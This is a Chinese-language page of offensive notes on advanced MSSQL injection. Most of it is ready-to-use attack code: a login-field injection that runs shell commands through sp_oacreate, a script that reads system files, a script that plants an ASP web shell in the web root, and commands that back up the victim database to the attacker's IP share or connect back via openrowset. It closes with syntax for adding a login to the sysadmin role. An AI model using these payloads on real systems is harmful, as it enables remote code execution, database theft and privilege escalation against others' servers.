Mssql高级注入笔记II(2)


指定在用户名后面来执行它: 
Username:'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'— 

使用FSO读一个已知的文本文件: 
declare @o int, @f int, @t int, @ret int 
declare @line varchar(8000) 
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 
exec @ret = sp_oamethod @f, 'readline', @line out 
while( @ret = 0 ) 
begin 
print @line 
exec @ret = sp_oamethod @f, 'readline', @line out 
end 

创建了一个能执行通过提交的命令,默认是asp那组权限的用户下运行,前提是sp_oacreate扩展存在 
declare @o int, @f int, @t int, @ret int 
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'createtextfile', @f out, 
'c:\inetpub\wwwroot\foo.asp', 1 
exec @ret = sp_oamethod @f, 'writeline', NULL, 
'<% set o = server.createobject("wscript.shell"): o.run( 
request.querystring("cmd") ) %>' 

sp_who '1' select * from sysobjects 

针对局域网渗透,备份拖库或者非sa用户 
declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat ,name=test;-- 
当前数据库就备份到你的硬盘上了 
select * from openrowset(sqloledb,myserver;sa;,select * from table) 回连,默认需要支持多语句查询 

添加登录,使其成为固定服务器角色的成员。 
语法 
sp_addsrvrolemember [ @loginame = ] 'login' 
[@rolename =] 'role' 
参数 
[@loginame =] 'login' 
是添加到固定服务器角色的登录名称。login 的数据类型为 sysname,没有默认值。login 可以是 Microsoft? SQL Server? 登录或 Microsoft Windows NT? 用户帐户。如果还没有对该 Windows NT 登录授予 SQL Server 访问权限,那么将自动对其授予访问权限。 
[@rolename =] 'role' 
要将登录添加到的固定服务器角色的名称。role 的数据类型为 sysname,默认值为 NULL,它必须是下列值之一: 
sysadmin 
securityadmin 
serveradmin 
setupadmin 
processadmin 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/3610.html